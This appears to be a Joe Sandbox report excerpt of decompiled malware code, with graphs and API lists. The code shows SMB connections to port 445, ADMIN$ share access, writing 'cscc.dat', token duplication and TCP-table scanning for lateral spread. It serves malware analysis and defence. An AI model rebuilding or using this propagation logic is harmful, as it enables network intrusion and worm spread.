                                                                                                                                                    • Part of subcall function 0477A016: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0477A1D0,00000000), ref: 0477A03C
                                                                                                                                                    • Part of subcall function 0477A016: DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 0477A059
                                                                                                                                                    • Part of subcall function 0477A016: CloseHandle.KERNEL32(?,04776AA8,00000000,00000000,00000000,00000024,04776AA8,00000000,0000FFFF), ref: 0477A0F5
                                                                                                                                                    • Part of subcall function 0477A016: CloseHandle.KERNEL32(0000FFFF,04776AA8,00000000,00000000,00000000,00000024,04776AA8,00000000,0000FFFF), ref: 0477A105
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000021), ref: 0477A2FD
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0477A300
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocHandleProcess$CloseThread$Token$AddressCreateCurrentDuplicateModuleOpenProc
                                                                                                                                                  • String ID: WaitForMultipleObjects$kernel32
                                                                                                                                                  • API String ID: 2880803415-195431251
                                                                                                                                                  • Opcode ID: d8f33cc1e03a8ea5daf8e55468a5f1647516df2410292001399a1fef6d7cb9f8
                                                                                                                                                  • Instruction ID: cb8227a8c162dbf194d1537a91e4a6c660e608e11e984b0190f61df254dbaebe
                                                                                                                                                  • Opcode Fuzzy Hash: d8f33cc1e03a8ea5daf8e55468a5f1647516df2410292001399a1fef6d7cb9f8
                                                                                                                                                  • Instruction Fuzzy Hash: 28416371E10205ABEF149FB8DD49AAEB774FF48310FA08529E611E7380EB74A941CB50
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 437 4775337-477535f GetProcessHeap HeapAlloc 438 4775365-477538f rand 437->438 439 47754fd-4775504 437->439 440 4775391-4775397 438->440 441 4775398-47753bf rand socket 438->441 440->441 442 47753c5-4775400 htons inet_addr connect 441->442 443 47754ed-47754f7 GetProcessHeap HeapFree 441->443 444 4775406-4775416 call 4771ca3 442->444 445 47754df 442->445 443->439 449 47754dc 444->449 450 477541c-4775432 call 4772191 444->450 446 47754e6-47754e7 closesocket 445->446 446->443 449->445 453 47754c6 450->453 454 4775438-4775457 call 47746c7 call 47721dc 450->454 456 47754cd-47754d2 call 4771dd1 453->456 461 477545c-4775460 454->461 459 47754d7-47754da 456->459 459->446 461->456 462 4775462-477547c call 4771eb9 461->462 462->456 465 477547e-4775492 call 4772054 462->465 465->456 468 4775494-47754aa call 4774ab5 465->468 468->456 471 47754ac-47754be call 477516b 468->471 471->456 474 47754c0-47754c4 471->474 474->456
                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                  			E04775337(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                  				char _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				signed int _v20;
                                                                                                                                                  				signed int _v24;
                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                  				short _v38;
                                                                                                                                                  				char _v40;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				signed int _t54;
                                                                                                                                                  				int _t56;
                                                                                                                                                  				short _t60;
                                                                                                                                                  				char* _t61;
                                                                                                                                                  				void* _t64;
                                                                                                                                                  				void* _t66;
                                                                                                                                                  				signed int _t70;
                                                                                                                                                  				int _t84;
                                                                                                                                                  				void* _t85;
                                                                                                                                                  				void* _t89;
                                                                                                                                                  
                                                                                                                                                  				_t85 = __ecx;
                                                                                                                                                  				_v20 = 0xbadf00d;
                                                                                                                                                  				_t89 = HeapAlloc(GetProcessHeap(), 8, 0x24);
                                                                                                                                                  				_v16 = _t89;
                                                                                                                                                  				if(_t89 == 0) {
                                                                                                                                                  					L19:
                                                                                                                                                  					return _v20;
                                                                                                                                                  				}
                                                                                                                                                  				 *((intOrPtr*)(_t89 + 4)) = 0x424d53fe;
                                                                                                                                                  				 *((char*)(_t89 + 0xd)) = 0x18;
                                                                                                                                                  				 *((short*)(_t89 + 0xe)) = 0x4801;
                                                                                                                                                  				 *((short*)(_t89 + 0x1e)) = 0xfeff;
                                                                                                                                                  				_t54 = rand() & 0x80001fff;
                                                                                                                                                  				if(_t54 < 0) {
                                                                                                                                                  					_t54 = (_t54 - 0x00000001 | 0xffffe000) + 1;
                                                                                                                                                  				}
                                                                                                                                                  				 *((short*)(_t89 + 0x22)) = _t54 + 0x1000;
                                                                                                                                                  				 *((intOrPtr*)(_t89 + 9)) = 0x300;
                                                                                                                                                  				_t56 = rand();
                                                                                                                                                  				 *(_t89 + 0x10) = _t56;
                                                                                                                                                  				__imp__#23(2, 1, 6); // executed
                                                                                                                                                  				_t84 = _t56;
                                                                                                                                                  				if(_t84 == 0xffffffff) {
                                                                                                                                                  					L18:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _t89);
                                                                                                                                                  					goto L19;
                                                                                                                                                  				}
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				_t60 = 2;
                                                                                                                                                  				_v40 = _t60;
                                                                                                                                                  				__imp__#9(0x1bd);
                                                                                                                                                  				_v38 = _t60;
                                                                                                                                                  				__imp__#11(_a4);
                                                                                                                                                  				_v36 = 0;
                                                                                                                                                  				_t61 =  &_v40;
                                                                                                                                                  				__imp__#4(_t84, _t61, 0x10); // executed
                                                                                                                                                  				if(_t61 == 0xffffffff) {
                                                                                                                                                  					L16:
                                                                                                                                                  					_v20 = 0xc0c0c0c;
                                                                                                                                                  					L17:
                                                                                                                                                  					__imp__#3(_t84); // executed
                                                                                                                                                  					goto L18;
                                                                                                                                                  				}
                                                                                                                                                  				_t64 = E04771CA3(_t84,  &_v16,  &_v20); // executed
                                                                                                                                                  				if(_t64 == 0) {
                                                                                                                                                  					_t89 = _v16;
                                                                                                                                                  					goto L16;
                                                                                                                                                  				}
                                                                                                                                                  				_v24 = _v24 & 0x00000000;
                                                                                                                                                  				_t88 =  &_v16;
                                                                                                                                                  				_t66 = E04772191( &_v16, _t84, _a4,  &_v24); // executed
                                                                                                                                                  				if(_t66 == 0) {
                                                                                                                                                  					_v20 = 0xc0c0c0c;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t90 = _v16;
                                                                                                                                                  					_t70 = E047746C7(_t85, _t84, _a4, _v16,  &_v24, _v20); // executed
                                                                                                                                                  					_v20 = _t70;
                                                                                                                                                  					E047721DC(_t84, _t88,  &_v24); // executed
                                                                                                                                                  					if(_v20 == 0) {
                                                                                                                                                  						_v20 = 0xf0f0f0f;
                                                                                                                                                  						if(E04771EB9(_t84, _t88, _a4, "ADMIN$") != 0 && E04772054(_t84, _t90,  &_v12, "cscc.dat", 1) == 0 && E04774AB5(_a20, _t85, _t84, _t90,  &_v24, _a12, _a16) != 0 && E0477516B(_t85, _t84, _t90, _a4, _a8, _a12) != 0) {
                                                                                                                                                  							_v20 = _v20 & 0x00000000;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				E04771DD1(_t85, _t84,  &_v16); // executed
                                                                                                                                                  				_t89 = _v16;
                                                                                                                                                  				goto L17;
                                                                                                                                                  			}





















                                                                                                                                                  0x04775337
                                                                                                                                                  0x04775344
                                                                                                                                                  0x04775358
                                                                                                                                                  0x0477535a
                                                                                                                                                  0x0477535f
                                                                                                                                                  0x047754fd
                                                                                                                                                  0x04775504
                                                                                                                                                  0x04775504
                                                                                                                                                  0x0477536b
                                                                                                                                                  0x04775372
                                                                                                                                                  0x0477537b
                                                                                                                                                  0x04775384
                                                                                                                                                  0x0477538a
                                                                                                                                                  0x0477538f
                                                                                                                                                  0x04775397
                                                                                                                                                  0x04775397
                                                                                                                                                  0x0477539d
                                                                                                                                                  0x047753a1
                                                                                                                                                  0x047753a8
                                                                                                                                                  0x047753b0
                                                                                                                                                  0x047753b4
                                                                                                                                                  0x047753ba
                                                                                                                                                  0x047753bf
                                                                                                                                                  0x047754ed
                                                                                                                                                  0x047754f7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047754f7
                                                                                                                                                  0x047753ca
                                                                                                                                                  0x047753cb
                                                                                                                                                  0x047753cc
                                                                                                                                                  0x047753cf
                                                                                                                                                  0x047753d0
                                                                                                                                                  0x047753d6
                                                                                                                                                  0x047753da
                                                                                                                                                  0x047753e3
                                                                                                                                                  0x047753e7
                                                                                                                                                  0x047753ed
                                                                                                                                                  0x047753f2
                                                                                                                                                  0x047753f7
                                                                                                                                                  0x04775400
                                                                                                                                                  0x047754df
                                                                                                                                                  0x047754df
                                                                                                                                                  0x047754e6
                                                                                                                                                  0x047754e7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047754e7
                                                                                                                                                  0x0477540f
                                                                                                                                                  0x04775416
                                                                                                                                                  0x047754dc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047754dc
                                                                                                                                                  0x0477541c
                                                                                                                                                  0x04775427
                                                                                                                                                  0x0477542b
                                                                                                                                                  0x04775432
                                                                                                                                                  0x047754c6
                                                                                                                                                  0x04775438
                                                                                                                                                  0x0477543b
                                                                                                                                                  0x04775447
                                                                                                                                                  0x0477544c
                                                                                                                                                  0x04775457
                                                                                                                                                  0x04775460
                                                                                                                                                  0x0477546e
                                                                                                                                                  0x0477547c
                                                                                                                                                  0x047754c0
                                                                                                                                                  0x047754c0
                                                                                                                                                  0x0477547c
                                                                                                                                                  0x04775460
                                                                                                                                                  0x047754d2
                                                                                                                                                  0x047754d7
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000024,0000FDE9,74CB6840,00000000,?,?,?,?,0477943A,?), ref: 0477534B
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,0477943A,?), ref: 04775352
                                                                                                                                                  • rand.MSVCRT ref: 04775388
                                                                                                                                                  • rand.MSVCRT ref: 047753A8
                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 047753B4
                                                                                                                                                  • htons.WS2_32(000001BD), ref: 047753DA
                                                                                                                                                  • inet_addr.WS2_32(?), ref: 047753E7
                                                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 047753F7
                                                                                                                                                    • Part of subcall function 0477516B: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 047751D3
                                                                                                                                                    • Part of subcall function 0477516B: HeapAlloc.KERNEL32(00000000), ref: 047751DC
                                                                                                                                                    • Part of subcall function 0477516B: GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 04775205
                                                                                                                                                    • Part of subcall function 0477516B: HeapAlloc.KERNEL32(00000000), ref: 04775208
                                                                                                                                                    • Part of subcall function 0477516B: rand.MSVCRT ref: 0477521B
                                                                                                                                                    • Part of subcall function 0477516B: rand.MSVCRT ref: 04775226
                                                                                                                                                    • Part of subcall function 0477516B: rand.MSVCRT ref: 0477522F
                                                                                                                                                    • Part of subcall function 0477516B: sprintf.MSVCRT ref: 04775246
                                                                                                                                                    • Part of subcall function 0477516B: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,0477943A), ref: 04775252
                                                                                                                                                    • Part of subcall function 0477516B: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0477943A), ref: 04775255
                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 047754E7
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0477943A,?), ref: 047754F0
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,0477943A,?), ref: 047754F7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Processrand$Alloc$Freeclosesocketconnecthtonsinet_addrsocketsprintf
                                                                                                                                                  • String ID: ADMIN$$cscc.dat
                                                                                                                                                  • API String ID: 228017060-1100196981
                                                                                                                                                  • Opcode ID: fd68ed3409c63f222ff3c7bef19f19087b747aa6015403ebfe1396b23f11f3cc
                                                                                                                                                  • Instruction ID: b8fb20c5053ef219a48fdbf30562e449d5292d762b97965653583c8f54b9d01a
                                                                                                                                                  • Opcode Fuzzy Hash: fd68ed3409c63f222ff3c7bef19f19087b747aa6015403ebfe1396b23f11f3cc
                                                                                                                                                  • Instruction Fuzzy Hash: 77516D71900359BBEF209FA4CC48EEF7BB9EF08355F404905BA15A7251D775A909CBA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 489 4771ca3-4771ccd GetProcessHeap RtlAllocateHeap 490 4771dc7-4771dce 489->490 491 4771cd3-4771ce0 GetProcessHeap HeapAlloc 489->491 492 4771ce6-4771d2e htons send 491->492 493 4771db5-4771dc1 GetProcessHeap HeapFree 491->493 494 4771da5-4771daf GetProcessHeap HeapFree 492->494 495 4771d30-4771d45 recv 492->495 493->490 494->493 495->494 496 4771d47-4771d4a 495->496 496->494 497 4771d4c-4771d60 call 4771c3a 496->497 497->494 500 4771d62-4771d66 497->500 501 4771d6b 500->501 502 4771d6d-4771d81 call 4771747 501->502 504 4771d86-4771d8b 502->504 504->494 505 4771d8d-4771d96 504->505 505->502 506 4771d98-4771da3 505->506 506->494 506->501
                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                  			E04771CA3(intOrPtr _a4, void** _a8, long _a12) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				void* _t34;
                                                                                                                                                  				void* _t41;
                                                                                                                                                  				short _t42;
                                                                                                                                                  				char _t45;
                                                                                                                                                  				char _t46;
                                                                                                                                                  				void* _t47;
                                                                                                                                                  				signed int _t48;
                                                                                                                                                  				intOrPtr* _t56;
                                                                                                                                                  				void* _t58;
                                                                                                                                                  				void* _t60;
                                                                                                                                                  				void* _t61;
                                                                                                                                                  
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t34 = RtlAllocateHeap(GetProcessHeap(), 8, 0xffff); // executed
                                                                                                                                                  				_v16 = _t34;
                                                                                                                                                  				if(_t34 != 0) {
                                                                                                                                                  					_t47 = HeapAlloc(GetProcessHeap(), 8, 0x33);
                                                                                                                                                  					if(_t47 != 0) {
                                                                                                                                                  						_t58 =  *_a8;
                                                                                                                                                  						 *((intOrPtr*)(_t58 + 4)) =  *((intOrPtr*)(_t58 + 4)) + 1;
                                                                                                                                                  						_t48 = 9;
                                                                                                                                                  						_t41 = memcpy(_t47, _t58, _t48 << 2);
                                                                                                                                                  						__imp__#9(0x2f);
                                                                                                                                                  						 *(_t47 + 2) = _t41;
                                                                                                                                                  						_t42 = 0xc;
                                                                                                                                                  						 *((char*)(_t47 + 8)) = 0x72;
                                                                                                                                                  						 *((short*)(_t47 + 0x25)) = _t42;
                                                                                                                                                  						 *((char*)(_t47 + 0x27)) = 2;
                                                                                                                                                  						asm("movsd");
                                                                                                                                                  						asm("movsd");
                                                                                                                                                  						asm("movsw");
                                                                                                                                                  						asm("movsb");
                                                                                                                                                  						__imp__#19(_a4, _t47, 0x33, 0); // executed
                                                                                                                                                  						if(_t42 > 0) {
                                                                                                                                                  							_t60 = _v16;
                                                                                                                                                  							__imp__#16(_a4, _t60, 0xffff, 0); // executed
                                                                                                                                                  							if(_t42 > 0) {
                                                                                                                                                  								_t68 =  *((intOrPtr*)(_t60 + 9));
                                                                                                                                                  								if( *((intOrPtr*)(_t60 + 9)) == 0) {
                                                                                                                                                  									_t45 = E04771C3A(0, _t68, _a4, _a8, _a12, _t60);
                                                                                                                                                  									_v5 = _t45;
                                                                                                                                                  									if(_t45 == 0) {
                                                                                                                                                  										_v12 = _v12 & 0x00000000;
                                                                                                                                                  										_t56 = 0x4783478;
                                                                                                                                                  										do {
                                                                                                                                                  											_t61 = 0;
                                                                                                                                                  											while(1) {
                                                                                                                                                  												_t23 = _t61 + 0x47834f0; // 0x4780494
                                                                                                                                                  												_t46 = E04771747(_a4, _a8, _a12,  *_t56,  *_t23, _v16); // executed
                                                                                                                                                  												_v5 = _t46;
                                                                                                                                                  												if(_t46 != 0) {
                                                                                                                                                  													goto L11;
                                                                                                                                                  												}
                                                                                                                                                  												_t61 = _t61 + 4;
                                                                                                                                                  												if(_t61 < 0xcc) {
                                                                                                                                                  													continue;
                                                                                                                                                  												} else {
                                                                                                                                                  													goto L10;
                                                                                                                                                  												}
                                                                                                                                                  												goto L11;
                                                                                                                                                  											}
                                                                                                                                                  											goto L11;
                                                                                                                                                  											L10:
                                                                                                                                                  											_v12 = _v12 + 4;
                                                                                                                                                  											_t56 = _t56 + 4;
                                                                                                                                                  										} while (_v12 < 0x78);
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						L11:
                                                                                                                                                  						HeapFree(GetProcessHeap(), 8, _t47);
                                                                                                                                                  					}
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                  				}
                                                                                                                                                  				return _v5;
                                                                                                                                                  			}

















                                                                                                                                                  0x04771cb9
                                                                                                                                                  0x04771cc6
                                                                                                                                                  0x04771cc8
                                                                                                                                                  0x04771ccd
                                                                                                                                                  0x04771cdc
                                                                                                                                                  0x04771ce0
                                                                                                                                                  0x04771ce9
                                                                                                                                                  0x04771ceb
                                                                                                                                                  0x04771cf0
                                                                                                                                                  0x04771cf5
                                                                                                                                                  0x04771cf7
                                                                                                                                                  0x04771cff
                                                                                                                                                  0x04771d03
                                                                                                                                                  0x04771d04
                                                                                                                                                  0x04771d08
                                                                                                                                                  0x04771d0c
                                                                                                                                                  0x04771d18
                                                                                                                                                  0x04771d19
                                                                                                                                                  0x04771d1a
                                                                                                                                                  0x04771d1c
                                                                                                                                                  0x04771d26
                                                                                                                                                  0x04771d2e
                                                                                                                                                  0x04771d30
                                                                                                                                                  0x04771d3d
                                                                                                                                                  0x04771d45
                                                                                                                                                  0x04771d47
                                                                                                                                                  0x04771d4a
                                                                                                                                                  0x04771d56
                                                                                                                                                  0x04771d5b
                                                                                                                                                  0x04771d60
                                                                                                                                                  0x04771d62
                                                                                                                                                  0x04771d66
                                                                                                                                                  0x04771d6b
                                                                                                                                                  0x04771d6b
                                                                                                                                                  0x04771d6d
                                                                                                                                                  0x04771d70
                                                                                                                                                  0x04771d81
                                                                                                                                                  0x04771d86
                                                                                                                                                  0x04771d8b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04771d8d
                                                                                                                                                  0x04771d96
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04771d96
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04771d98
                                                                                                                                                  0x04771d98
                                                                                                                                                  0x04771d9c
                                                                                                                                                  0x04771d9f
                                                                                                                                                  0x04771d6b
                                                                                                                                                  0x04771d60
                                                                                                                                                  0x04771d4a
                                                                                                                                                  0x04771d45
                                                                                                                                                  0x04771da5
                                                                                                                                                  0x04771daf
                                                                                                                                                  0x04771daf
                                                                                                                                                  0x04771dc1
                                                                                                                                                  0x04771dc1
                                                                                                                                                  0x04771dce

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,04775414,00000000,?,0BADF00D,?,?,?,?,0477943A,?), ref: 04771CBD
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,0477943A,?), ref: 04771CC6
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000033,?,?,?,?,0477943A,?), ref: 04771CD7
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,0477943A,?), ref: 04771CDA
                                                                                                                                                  • htons.WS2_32(0000002F), ref: 04771CF7
                                                                                                                                                  • send.WS2_32(00000033,00000000,00000033,00000000), ref: 04771D26
                                                                                                                                                  • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04771D3D
                                                                                                                                                    • Part of subcall function 04771747: GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,04771C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 04771783
                                                                                                                                                    • Part of subcall function 04771747: HeapAlloc.KERNEL32(00000000), ref: 0477178C
                                                                                                                                                    • Part of subcall function 04771747: CharUpperW.USER32(00000000), ref: 047717B2
                                                                                                                                                    • Part of subcall function 04771747: GetProcessHeap.KERNEL32(00000008,00000086), ref: 047717DA
                                                                                                                                                    • Part of subcall function 04771747: HeapAlloc.KERNEL32(00000000), ref: 047717DD
                                                                                                                                                    • Part of subcall function 04771747: htons.WS2_32(00000082), ref: 04771801
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0477943A,?), ref: 04771DA8
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,0477943A,?), ref: 04771DAF
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0477943A,?), ref: 04771DBA
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,0477943A,?), ref: 04771DC1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$Alloc$Freehtons$AllocateCharUpperrecvsend
                                                                                                                                                  • String ID: NT LM 0.12$x
                                                                                                                                                  • API String ID: 30026595-3673895198
                                                                                                                                                  • Opcode ID: 4af948708996bde78c337e065b0965a1fbc6e060daaf1356b41adabbe7ed5695
                                                                                                                                                  • Instruction ID: 56464954753a18390987608e2819e9202ff9eb548326411cac043192534e90eb
                                                                                                                                                  • Opcode Fuzzy Hash: 4af948708996bde78c337e065b0965a1fbc6e060daaf1356b41adabbe7ed5695
                                                                                                                                                  • Instruction Fuzzy Hash: 6131BD32900205BBEF229FE4CC48F9A7F79EF45750F85C0A9FA49AB391C675A905CB50
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 507 477733c-4777355 LoadLibraryW 508 4777425-4777429 507->508 509 477735b-477736d GetProcAddress 507->509 510 4777414 GetLastError 509->510 511 4777373-4777392 GetProcessHeap RtlAllocateHeap 509->511 512 477741a-4777424 FreeLibrary 510->512 511->512 513 4777398-47773ac GetExtendedTcpTable 511->513 512->508 514 4777402-4777412 GetProcessHeap RtlFreeHeap 513->514 515 47773ae-47773b5 513->515 514->512 515->514 516 47773b7 515->516 517 47773ba-47773be 516->517 518 47773f5-4777400 517->518 519 47773c0-47773f2 wsprintfW call 4776b95 517->519 518->514 518->517 519->518
                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                  			E0477733C(intOrPtr _a4) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				long _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				struct HINSTANCE__* _v20;
                                                                                                                                                  				short _v84;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				struct HINSTANCE__* _t20;
                                                                                                                                                  				void* _t27;
                                                                                                                                                  				signed int _t29;
                                                                                                                                                  				void* _t41;
                                                                                                                                                  				intOrPtr* _t45;
                                                                                                                                                  				signed char* _t47;
                                                                                                                                                  				void* _t50;
                                                                                                                                                  				void* _t52;
                                                                                                                                                  
                                                                                                                                                  				_t41 = 0;
                                                                                                                                                  				_t20 = LoadLibraryW(L"iphlpapi.dll");
                                                                                                                                                  				_v20 = _t20;
                                                                                                                                                  				if(_t20 != 0) {
                                                                                                                                                  					_t45 = GetProcAddress(_t20, "GetExtendedTcpTable");
                                                                                                                                                  					if(_t45 == 0) {
                                                                                                                                                  						GetLastError();
                                                                                                                                                  					} else {
                                                                                                                                                  						_v12 = 0x100000;
                                                                                                                                                  						_t27 = RtlAllocateHeap(GetProcessHeap(), 8, 0x100000); // executed
                                                                                                                                                  						_t50 = _t27;
                                                                                                                                                  						_v16 = _t50;
                                                                                                                                                  						if(_t50 != 0) {
                                                                                                                                                  							_t29 =  *_t45(_t50,  &_v12, 0, 2, 1, 0); // executed
                                                                                                                                                  							asm("sbb ebx, ebx");
                                                                                                                                                  							_t41 =  ~_t29 + 1;
                                                                                                                                                  							if(_t41 != 0) {
                                                                                                                                                  								_v8 = _v8 & 0x00000000;
                                                                                                                                                  								if( *_t50 > 0) {
                                                                                                                                                  									_t7 = _t50 + 0x12; // 0x12
                                                                                                                                                  									_t47 = _t7;
                                                                                                                                                  									do {
                                                                                                                                                  										if( *((intOrPtr*)(_t47 - 0xe)) == 5) {
                                                                                                                                                  											wsprintfW( &_v84, L"%u.%u.%u.%u",  *(_t47 - 2) & 0x000000ff,  *(_t47 - 1) & 0x000000ff,  *_t47 & 0x000000ff, _t47[1] & 0x000000ff);
                                                                                                                                                  											_t52 = _t52 + 0x18;
                                                                                                                                                  											E04776B95( &_v84, 0, _a4);
                                                                                                                                                  											_t50 = _v16;
                                                                                                                                                  										}
                                                                                                                                                  										_v8 = _v8 + 1;
                                                                                                                                                  										_t47 =  &(_t47[0x14]);
                                                                                                                                                  									} while (_v8 <  *_t50);
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							RtlFreeHeap(GetProcessHeap(), 0, _t50); // executed
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					FreeLibrary(_v20);
                                                                                                                                                  				}
                                                                                                                                                  				return _t41;
                                                                                                                                                  			}

















                                                                                                                                                  0x04777348
                                                                                                                                                  0x0477734a
                                                                                                                                                  0x04777350
                                                                                                                                                  0x04777355
                                                                                                                                                  0x04777369
                                                                                                                                                  0x0477736d
                                                                                                                                                  0x04777414
                                                                                                                                                  0x04777373
                                                                                                                                                  0x0477737b
                                                                                                                                                  0x04777385
                                                                                                                                                  0x0477738b
                                                                                                                                                  0x0477738d
                                                                                                                                                  0x04777392
                                                                                                                                                  0x047773a3
                                                                                                                                                  0x047773a9
                                                                                                                                                  0x047773ab
                                                                                                                                                  0x047773ac
                                                                                                                                                  0x047773ae
                                                                                                                                                  0x047773b5
                                                                                                                                                  0x047773b7
                                                                                                                                                  0x047773b7
                                                                                                                                                  0x047773ba
                                                                                                                                                  0x047773be
                                                                                                                                                  0x047773dc
                                                                                                                                                  0x047773e2
                                                                                                                                                  0x047773ed
                                                                                                                                                  0x047773f2
                                                                                                                                                  0x047773f2
                                                                                                                                                  0x047773f5
                                                                                                                                                  0x047773fb
                                                                                                                                                  0x047773fe
                                                                                                                                                  0x047773ba
                                                                                                                                                  0x047773b5
                                                                                                                                                  0x0477740c
                                                                                                                                                  0x0477740c
                                                                                                                                                  0x04777392
                                                                                                                                                  0x0477741d
                                                                                                                                                  0x04777424
                                                                                                                                                  0x04777429

